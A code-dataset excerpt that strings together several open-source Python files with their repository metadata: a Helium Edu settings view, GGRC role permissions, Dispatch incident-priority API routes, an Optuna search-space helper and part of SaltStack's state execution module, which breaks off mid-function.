from helium.common.views.views import HeliumAPIView
__author__ = "Alex Laird"
__copyright__ = "Copyright 2021, Helium Edu"
__version__ = "1.4.46"
logger = logging.getLogger(__name__)
class UserSettingsApiDetailView(HeliumAPIView):
"""
put:
Update the authenticated user's settings. This endpoint only updates the fields given (i.e. no need to PATCH
for partials data).
For more details pertaining to choice field values, [see here](https://github.com/HeliumEdu/platform/wiki#choices).
"""
queryset = get_user_model().objects.all()
serializer_class = UserSettingsSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
user = self.get_object()
serializer = self.get_serializer(user.settings, data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
logger.info(f'Settings updated for user {user.get_username()}')
return Response(serializer.data)
| 31.428571
| 119
| 0.744697
|
4a04c6923c9faa9634338334fe24955e29a5f0fe
| 2,910
|
py
|
Python
|
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2018-07-06T00:04:23.000Z
|
2021-02-26T21:13:20.000Z
|
src/ggrc_basic_permissions/roles/Reader.py
|
Killswitchz/ggrc-core
|
2460df94daf66727af248ad821462692917c97a9
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-11-11T22:16:56.000Z
|
2017-11-11T22:16:56.000Z
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with configuration of the Reader role's permissions."""
# pylint: disable=invalid-name
from ggrc_basic_permissions.roles.Creator import owner_update
scope = "System"
description = """
This role grants a user basic, read-only, access permission to a GGRC
instance.
"""
permissions = {
"read": [
"AccessControlList",
"Audit",
"Snapshot",
"Categorization",
"Category",
"ControlCategory",
"ControlAssertion",
"Control",
"Comment",
"Assessment",
"AssessmentTemplate",
"CustomAttributeDefinition",
"CustomAttributeValue",
"Issue",
"ControlControl",
"DataAsset",
"AccessGroup",
"Directive",
"Contract",
"Policy",
"Regulation",
"Standard",
"Document",
"Facility",
"Help",
"Market",
"Objective",
"ObjectControl",
"ObjectObjective",
"ObjectPerson",
"Option",
"OrgGroup",
"Vendor",
"PopulationSample",
"Product",
"ProgramControl",
"ProgramDirective",
"Project",
"Relationship",
"Section",
"Clause",
"SystemOrProcess",
"System",
"Process",
"SystemControl",
"SystemSystem",
"Person",
"Program",
"Revision",
"Role",
"UserRole",
"Context",
{
"type": "BackgroundTask",
"terms": {
"property_name": "modified_by",
"value": "$current_user"
},
"condition": "is"
},
],
"create": [
"Workflow"
"Categorization",
"Category",
"ControlCategory",
"ControlAssertion",
"Control",
"Comment",
"DataAsset",
"AccessGroup",
"Directive",
"Contract",
"Policy",
"Regulation",
"Standard",
"Document",
"Facility",
"Help",
"Market",
"Objective",
"ObjectPerson",
"Option",
"OrgGroup",
"Vendor",
"PopulationSample",
"Product",
"Project",
{
"type": "Relationship",
"terms": {
"property_name": "source,destination",
"action": "update"
},
"condition": "relationship",
},
"Section",
"Clause",
"SystemOrProcess",
"System",
"Process",
"Person",
"Program",
"Role",
"Context",
"BackgroundTask",
],
"view_object_page": [
"__GGRC_ALL__"
],
"update": owner_update,
"delete": owner_update,
}
| 22.045455
| 78
| 0.47354
|
4a04c755e231cb5561fabc7e7105c8655722b358
| 2,621
|
py
|
Python
|
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
src/dispatch/incident_priority/views.py
|
BuildJet/dispatch
|
d9fcaabefecfb24bbf3bbed1ed942084b7bdbea2
|
[
"Apache-2.0"
] | null | null | null |
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from dispatch.database.core import get_db
from dispatch.database.service import common_parameters, search_filter_sort_paginate
from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency
from .models import (
IncidentPriorityCreate,
IncidentPriorityPagination,
IncidentPriorityRead,
IncidentPriorityUpdate,
)
from .service import create, get, update
router = APIRouter()
@router.get("/", response_model=IncidentPriorityPagination, tags=["incident_priorities"])
def get_incident_priorities(*, common: dict = Depends(common_parameters)):
"""
Returns all incident priorities.
"""
return search_filter_sort_paginate(model="IncidentPriority", **common)
@router.post(
"/",
response_model=IncidentPriorityRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def create_incident_priority(
*,
db_session: Session = Depends(get_db),
incident_priority_in: IncidentPriorityCreate,
):
"""
Create a new incident priority.
"""
incident_priority = create(db_session=db_session, incident_priority_in=incident_priority_in)
return incident_priority
@router.put(
"/{incident_priority_id}",
response_model=IncidentPriorityRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def update_incident_priority(
*,
db_session: Session = Depends(get_db),
incident_priority_id: int,
incident_priority_in: IncidentPriorityUpdate,
):
"""
Update an existing incident priority.
"""
incident_priority = get(db_session=db_session, incident_priority_id=incident_priority_id)
if not incident_priority:
raise HTTPException(
status_code=404, detail="The incident priority with this id does not exist."
)
incident_priority = update(
db_session=db_session,
incident_priority=incident_priority,
incident_priority_in=incident_priority_in,
)
return incident_priority
@router.get("/{incident_priority_id}", response_model=IncidentPriorityRead)
def get_incident_priority(*, db_session: Session = Depends(get_db), incident_priority_id: int):
"""
Get an incident priority.
"""
incident_priority = get(db_session=db_session, incident_priority_id=incident_priority_id)
if not incident_priority:
raise HTTPException(
status_code=404, detail="The incident priority with this id does not exist."
)
return incident_priority
| 31.202381
| 96
| 0.751622
|
4a04c792708b0dfcc86f28746d98e08203ddff23
| 125
|
py
|
Python
|
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | null | null | null |
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | null | null | null |
setup.py
|
jmathison/gym-simpleflappy
|
54acd54346f0ba4a611120a9ebba69acf0bae8b5
|
[
"MIT"
] | 1
|
2019-09-19T05:26:02.000Z
|
2019-09-19T05:26:02.000Z
|
from setuptools import setup
setup(name='gym_simpleflappy',
version='0.0.1',
install_requires=['gym','pygame']
)
| 20.833333
| 39
| 0.68
|
4a04c824459e8f20ee32e2dde4e638af1f687df0
| 255
|
py
|
Python
|
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | 1
|
2018-10-04T15:29:04.000Z
|
2018-10-04T15:29:04.000Z
|
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | null | null | null |
bin/template_minimal.py
|
cirosantilli/python-utils
|
3854d2c7973c6382f76e311423c219bccacb8c1d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#==================================================
#
# Ciro D. Santilli
#
# default argparsers
#
#==================================================
if __name__ == "__main__":
import doctest
doctest.testmod()
| 9.807692
| 51
| 0.352941
|
4a04c879a8a89aafc1478bec9b1c9f5a0525270e
| 2,344
|
py
|
Python
|
optuna/samplers/_search_space/group_decomposed.py
|
occamzrazor/optuna
|
89e38174e0f4ce245d31ea0e5fe3f6062deb093a
|
[
"MIT"
] | 1
|
2021-02-25T12:30:12.000Z
|
2021-02-25T12:30:12.000Z
|
optuna/samplers/_search_space/group_decomposed.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | 5
|
2021-05-23T08:39:21.000Z
|
2021-05-23T09:34:55.000Z
|
optuna/samplers/_search_space/group_decomposed.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | null | null | null |
import copy
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
from optuna.distributions import BaseDistribution
from optuna.study import BaseStudy
from optuna.trial import TrialState
class _SearchSpaceGroup(object):
def __init__(self) -> None:
self._search_spaces: List[Dict[str, BaseDistribution]] = []
@property
def search_spaces(self) -> List[Dict[str, BaseDistribution]]:
return self._search_spaces
def add_distributions(self, distributions: Dict[str, BaseDistribution]) -> None:
dist_keys = set(distributions.keys())
next_search_spaces = []
for search_space in self._search_spaces:
keys = set(search_space.keys())
next_search_spaces.append({name: search_space[name] for name in keys & dist_keys})
next_search_spaces.append({name: search_space[name] for name in keys - dist_keys})
dist_keys -= keys
next_search_spaces.append({name: distributions[name] for name in dist_keys})
self._search_spaces = list(
filter(lambda search_space: len(search_space) > 0, next_search_spaces)
)
class _GroupDecomposedSearchSpace(object):
def __init__(self, include_pruned: bool = False) -> None:
self._search_space = _SearchSpaceGroup()
self._study_id: Optional[int] = None
self._include_pruned = include_pruned
def calculate(self, study: BaseStudy) -> _SearchSpaceGroup:
if self._study_id is None:
self._study_id = study._study_id
else:
# Note that the check below is meaningless when `InMemoryStorage` is used
# because `InMemoryStorage.create_new_study` always returns the same study ID.
if self._study_id != study._study_id:
raise ValueError("`_GroupDecomposedSearchSpace` cannot handle multiple studies.")
states_of_interest: Tuple[TrialState, ...]
if self._include_pruned:
states_of_interest = (TrialState.COMPLETE, TrialState.PRUNED)
else:
states_of_interest = (TrialState.COMPLETE,)
for trial in study.get_trials(deepcopy=False, states=states_of_interest):
self._search_space.add_distributions(trial.distributions)
return copy.deepcopy(self._search_space)
| 37.206349
| 97
| 0.691126
|
4a04caf72dcf589752ad34b253ef70f1b92c083d
| 135,666
|
py
|
Python
|
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
salt/state.py
|
Rafflecopter/salt
|
08bbfcd4d9b93351d7d5d25b097e892026b6f1cd
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
The module used to execute states in salt. A state is unlike a module
execution in that instead of just executing a command it ensure that a
certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
'''
# Import python libs
from __future__ import absolute_import
import os
import sys
import copy
import site
import fnmatch
import logging
import datetime
import traceback
# Import salt libs
import salt.utils
import salt.loader
import salt.minion
import salt.pillar
import salt.fileclient
import salt.utils.event
import salt.utils.url
import salt.syspaths as syspaths
from salt.utils import context, immutabletypes
from salt.template import compile_template, compile_template_str
from salt.exceptions import SaltRenderError, SaltReqTimeoutError, SaltException
from salt.utils.odict import OrderedDict, DefaultOrderedDict
# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset([
'onchanges',
'onfail',
'prereq',
'prerequired',
'watch',
'require',
'listen',
])
STATE_REQUISITE_IN_KEYWORDS = frozenset([
'onchanges_in',
'onfail_in',
'prereq_in',
'watch_in',
'require_in',
'listen_in',
])
STATE_RUNTIME_KEYWORDS = frozenset([
'fun',
'state',
'check_cmd',
'failhard',
'onlyif',
'unless',
'order',
'prereq',
'prereq_in',
'prerequired',
'reload_modules',
'reload_grains',
'reload_pillar',
'fire_event',
'saltenv',
'use',
'use_in',
'__env__',
'__sls__',
'__id__',
'__pub_user',
'__pub_arg',
'__pub_jid',
'__pub_fun',
'__pub_tgt',
'__pub_ret',
'__pub_pid',
'__pub_tgt_type',
'__prereq__',
])
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(STATE_REQUISITE_IN_KEYWORDS).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
'''
Take a low tag and split it back into the low dict that it came from
'''
state, id_, name, fun = tag.split('_|-')
return {'state': state,
'__id__': id_,
'name': name,
'fun': fun}
def _gen_tag(low):
'''
Generate the running dict tag string from the low data structure
'''
return '{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}'.format(low)
def _l_tag(name, id_):
low = {'name': 'listen_{0}'.format(name),
'__id__': 'listen_{0}'.format(id_),
'state': 'Listen_Error',
'fun': 'Listen_Error'}
return _gen_tag(low)
def trim_req(req):
'''
Trim any function off of a requisite
'''
reqfirst = next(iter(req))
if '.' in reqfirst:
return {reqfirst.split('.')[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
'''
Return a set of the arguments passed to the named state
'''
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
'''
Scan high data for the id referencing the given name
'''
ext_id = ''
if name in high:
ext_id = name
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(
high[nid][state],
list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id = nid
return ext_id
def format_log(ret):
'''
Format the state into a log message
'''
msg = ''
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if 'changes' in ret:
# Yep, looks like a valid state return
chg = ret['changes']
if not chg:
if ret['comment']:
msg = ret['comment']
else:
msg = 'No changes made for {0[name]}'.format(ret)
elif isinstance(chg, dict):
if 'diff' in chg:
if isinstance(chg['diff'], six.string_types):
msg = 'File changed:\n{0}'.format(chg['diff'])
if all([isinstance(x, dict) for x in six.itervalues(chg)]):
if all([('old' in x and 'new' in x)
for x in six.itervalues(chg)]):
msg = 'Made the following changes:\n'
for pkg in chg:
old = chg[pkg]['old']
if not old and old not in (False, None):
old = 'absent'
new = chg[pkg]['new']
if not new and new not in (False, None):
new = 'absent'
msg += '{0} changed from {1} to ' \
'{2}\n'.format(pkg, old, new)
if not msg:
msg = str(ret['changes'])
if ret['result'] is True or ret['result'] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
'''
Compile the master side low state data, and build the hidden state file
'''
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
class StateError(Exception):
'''
Custom exception class.
'''
pass
class Compiler(object):
'''
Class used to compile and manage the High Data structure
'''
def __init__(self, opts):
self.opts = opts
self.rend = salt.loader.render(self.opts, {})
# We need __setstate__ and __getstate__ to avoid pickling errors since
# 'self.rend' contains a function reference which is not picklable.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts}
def render_template(self, template, **kwargs):
'''
Enforce the states in a template
'''
high = compile_template(
template, self.rend, self.opts['renderer'], **kwargs)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
'''
Turns dot delimited function refs into function strings
'''
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# Is this is a short state? It needs to be padded!
if '.' in high[name]:
comps = high[name].split('.')
if len(comps) >= 2:
# Merge the comps
comps[1] = '.'.join(comps[1:len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith('_'):
continue
if not isinstance(high[name][key], list):
continue
if '.' in key:
comps = key.split('.')
if len(comps) >= 2:
# Merge the comps
comps[1] = '.'.join(comps[1:len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
'''
Verify that the high data is viable and follows the data structure
'''
errors = []
if not isinstance(high, dict):
errors.append('High data is not a dictionary and is invalid')
reqs = {}
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
if not isinstance(name, six.string_types):
errors.append(
'ID {0!r} in SLS {1!r} is not formed as a string, but is '
'a {2}'.format(name, body['__sls__'], type(name).__name__)
)
if not isinstance(body, dict):
err = ('The type {0} in {1} is not formatted as a dictionary'
.format(name, body))
errors.append(err)
continue
for state in body:
if state.startswith('__'):
continue
if not isinstance(body[state], list):
errors.append(
'State {0!r} in SLS {1!r} is not formed as a list'
.format(name, body['__sls__'])
)
else:
fun = 0
if '.' in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if ' ' in arg.strip():
errors.append(('The function "{0}" in state '
'"{1}" in SLS "{2}" has '
'whitespace, a function with whitespace is '
'not supported, perhaps this is an argument '
'that is missing a ":"').format(
arg,
name,
body['__sls__']))
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ('require', 'watch', 'prereq'):
if not isinstance(arg[argfirst], list):
errors.append(('The {0}'
' statement in state {1!r} in SLS {2!r} '
'needs to be formed as a list').format(
argfirst,
name,
body['__sls__']
))
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {'state': state}
for req in arg[argfirst]:
if not isinstance(req, dict):
err = ('Requisite declaration {0}'
' in SLS {1} is not formed as a'
' single key dictionary').format(
req,
body['__sls__'])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if '.' in req_key:
errors.append((
'Invalid requisite type {0!r} '
'in state {1!r}, in SLS '
'{2!r}. Requisite types must '
'not contain dots, did you '
'mean {3!r}?'.format(
req_key,
name,
body['__sls__'],
req_key[:req_key.find('.')]
)
))
if not ishashable(req_val):
errors.append((
'Illegal requisite "{0}", '
'is SLS {1}\n'
).format(
str(req_val),
body['__sls__']))
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if reqs[req_val]['state'] == reqs[name][req_val]:
err = ('A recursive '
'requisite was found, SLS '
'"{0}" ID "{1}" ID "{2}"'
).format(
body['__sls__'],
name,
req_val
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(('Multiple dictionaries '
'defined in argument of state {0!r} in SLS'
' {1!r}').format(
name,
body['__sls__']))
if not fun:
if state == 'require' or state == 'watch':
continue
errors.append(('No function declared in state {0!r} in'
' SLS {1!r}').format(state, body['__sls__']))
elif fun > 1:
errors.append(
'Too many functions declared in state {0!r} in '
'SLS {1!r}'.format(state, body['__sls__'])
)
return errors
def order_chunks(self, chunks):
'''
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
'''
cap = 1
for chunk in chunks:
if 'order' in chunk:
if not isinstance(chunk['order'], int):
continue
chunk_order = chunk['order']
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if 'order' not in chunk:
chunk['order'] = cap
continue
if not isinstance(chunk['order'], (int, float)):
if chunk['order'] == 'last':
chunk['order'] = cap + 1000000
else:
chunk['order'] = cap
if 'name_order' in chunk:
chunk['order'] = chunk['order'] + chunk.pop('name_order') / 10000.0
if chunk['order'] < 0:
chunk['order'] = cap + 1000000 + chunk['order']
chunks.sort(key=lambda chunk: (chunk['order'], '{0[state]}{0[name]}{0[fun]}'.format(chunk)))
return chunks
def compile_high_data(self, high):
'''
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
'''
chunks = []
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
for state, run in six.iteritems(body):
funcs = set()
names = set()
if state.startswith('__'):
continue
chunk = {'state': state,
'name': name}
if '__sls__' in body:
chunk['__sls__'] = body['__sls__']
if '__env__' in body:
chunk['__env__'] = body['__env__']
chunk['__id__'] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == 'names':
names.update(val)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live['name'] = low_name
live.update(entry[low_name][0])
else:
live['name'] = entry
live['name_order'] = name_order
name_order = name_order + 1
for fun in funcs:
live['fun'] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live['fun'] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
'''
Read in the __exclude__ list and remove all excluded objects from the
high data
'''
if '__exclude__' not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop('__exclude__')
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == 'sls':
ex_sls.add(exc['sls'])
elif key == 'id':
ex_id.add(exc['id'])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
if body.get('__sls__', '') in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State(object):
'''
Class used to execute salt states
'''
def __init__(self, opts, pillar=None, jid=None):
if 'grains' not in opts:
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
self._pillar_override = pillar
self.opts['pillar'] = self._gather_pillar()
self.state_con = {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
def _gather_pillar(self):
'''
Whenever a state run starts, gather the pillar data fresh
'''
pillar = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillar=self._pillar_override,
pillarenv=self.opts.get('pillarenv')
)
ret = pillar.compile_pillar()
if self._pillar_override and isinstance(self._pillar_override, dict):
ret.update(self._pillar_override)
return ret
def _mod_init(self, low):
'''
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
'''
# ensure that the module is loaded
self.states['{0}.{1}'.format(low['state'], low['fun'])] # pylint: disable=W0106
minit = '{0}.mod_init'.format(low['state'])
if low['state'] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low['state'])
def _mod_aggregate(self, low, running, chunks):
'''
Execute the aggregation systems to runtime modify the low chunk
'''
agg_opt = self.functions['config.option']('state_aggregate')
if low.get('aggregate') is True:
agg_opt = low['aggregate']
if agg_opt is True:
agg_opt = [low['state']]
else:
return low
if low['state'] in agg_opt and not low.get('__agg__'):
agg_fun = '{0}.mod_aggregate'.format(low['state'])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low['__agg__'] = True
except TypeError:
log.error('Failed to execute aggregate for state {0}'.format(low['state']))
return low
def _run_check(self, low_data):
'''
Check that unless doesn't return 0, and that onlyif returns a 0.
'''
ret = {'result': False}
cmd_opts = {}
if 'shell' in self.opts['grains']:
cmd_opts['shell'] = self.opts['grains'].get('shell')
if 'onlyif' in low_data:
if not isinstance(low_data['onlyif'], list):
low_data_onlyif = [low_data['onlyif']]
else:
low_data_onlyif = low_data['onlyif']
for entry in low_data_onlyif:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd != 0 and ret['result'] is False:
ret.update({'comment': 'onlyif execution failed',
'skip_watch': True,
'result': True})
return ret
elif cmd == 0:
ret.update({'comment': 'onlyif execution succeeded', 'result': False})
return ret
if 'unless' in low_data:
if not isinstance(low_data['unless'], list):
low_data_unless = [low_data['unless']]
else:
low_data_unless = low_data['unless']
for entry in low_data_unless:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd == 0 and ret['result'] is False:
ret.update({'comment': 'unless execution succeeded',
'skip_watch': True,
'result': True})
elif cmd != 0:
ret.update({'comment': 'unless execution failed', 'result': False})
return ret
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
'''
Alter the way a successful state run is determined
'''
ret = {'result': False}
cmd_opts = {}
if 'shell' in self.opts['grains']:
cmd_opts['shell'] = self.opts['grains'].get('shell')
for entry in low_data['check_cmd']:
cmd = self.functions['cmd.retcode'](
entry, ignore_retcode=True, python_shell=True, **cmd_opts)
log.debug('Last command return code: {0}'.format(cmd))
if cmd == 0 and ret['result'] is False:
ret.update({'comment': 'check_cmd determined the state succeeded', 'result': True})
elif cmd != 0:
ret.update({'comment': 'check_cmd determined the state failed', 'result': False})
return ret
return ret
def load_modules(self, data=None):
'''
Load the modules into the state
'''
log.info('Loading fresh modules for state activity')
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, self.state_con, utils=self.utils)
if isinstance(data, dict):
if data.get('provider', False):
if isinstance(data['provider'], str):
providers = [{data['state']: data['provider']}]
elif isinstance(data['provider'], list):
providers = data['provider']
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(self.opts,
provider[mod],
self.functions)
if funcs:
for func in funcs:
f_key = '{0}{1}'.format(
mod,
func[func.rindex('.'):]
)
self.functions[f_key] = funcs[func]
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions, states=self.states)
def module_refresh(self):
'''
Refresh all the modules
'''
log.debug('Refreshing modules...')
if self.opts['grains'].get('os') != 'MacOS':
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload(site)
except RuntimeError:
log.error('Error encountered during module reload. Modules were not reloaded.')
self.load_modules()
if not self.opts.get('local', False) and self.opts.get('multiprocessing', True):
self.functions['saltutil.refresh_modules']()
def check_refresh(self, data, ret):
'''
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
'''
_reload_modules = False
if data.get('reload_grains', False):
log.debug('Refreshing grains...')
self.opts['grains'] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get('reload_pillar', False):
log.debug('Refreshing pillar...')
self.opts['pillar'] = self._gather_pillar()
_reload_modules = True
if data.get('reload_modules', False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if not ret['changes']:
return
if data['state'] == 'file':
if data['fun'] == 'managed':
if data['name'].endswith(
('.py', '.pyx', '.pyo', '.pyc', '.so')):
self.module_refresh()
elif data['fun'] == 'recurse':
self.module_refresh()
elif data['fun'] == 'symlink':
if 'bin' in data['name']:
self.module_refresh()
elif data['state'] in ('pkg', 'ports'):
self.module_refresh()
def verify_ret(self, ret):
'''
Verify the state return data
'''
if not isinstance(ret, dict):
raise SaltException(
'Malformed state return, return must be a dict'
)
bad = []
for val in ['name', 'result', 'changes', 'comment']:
if val not in ret:
bad.append(val)
if bad:
raise SaltException(
('The following keys were not present in the state '
'return: {0}'
).format(','.join(bad)))
def verify_data(self, data):
'''
Verify the data, return an error statement if something is wrong
'''
errors = []
if 'state' not in data:
errors.append('Missing "state" data')
if 'fun' not in data:
errors.append('Missing "fun" data')
if 'name' not in data:
errors.append('Missing "name" data')
if data['name'] and not isinstance(data['name'], six.string_types):
errors.append(
'ID {0!r} in SLS {1!r} is not formed as a string, but is '
'a {2}'.format(
data['name'], data['__sls__'], type(data['name']).__name__)
)
if errors:
return errors
full = data['state'] + '.' + data['fun']
if full not in self.states:
if '__sls__' in data:
errors.append(
'State \'{0}\' was not found in SLS \'{1}\''.format(
full,
data['__sls__']
)
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append('Reason: {0}'.format(reason))
else:
errors.append(
'Specified state \'{0}\' was not found'.format(
full
)
)
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
'Missing parameter {0} for state {1}'.format(
aspec.args[ind],
full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ''
if 'require' in data:
reqdec = 'require'
if 'watch' in data:
# Check to see if the service has a mod_watch function, if it does
# not, then just require
# to just require extend the require statement with the contents
# of watch so that the mod_watch function is not called and the
# requisite capability is still used
if '{0}.mod_watch'.format(data['state']) not in self.states:
if 'require' in data:
data['require'].extend(data.pop('watch'))
else:
data['require'] = data.pop('watch')
reqdec = 'require'
else:
reqdec = 'watch'
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data['state'] == reqfirst:
if (fnmatch.fnmatch(data['name'], req[reqfirst])
or fnmatch.fnmatch(data['__id__'], req[reqfirst])):
err = ('Recursive require detected in SLS {0} for'
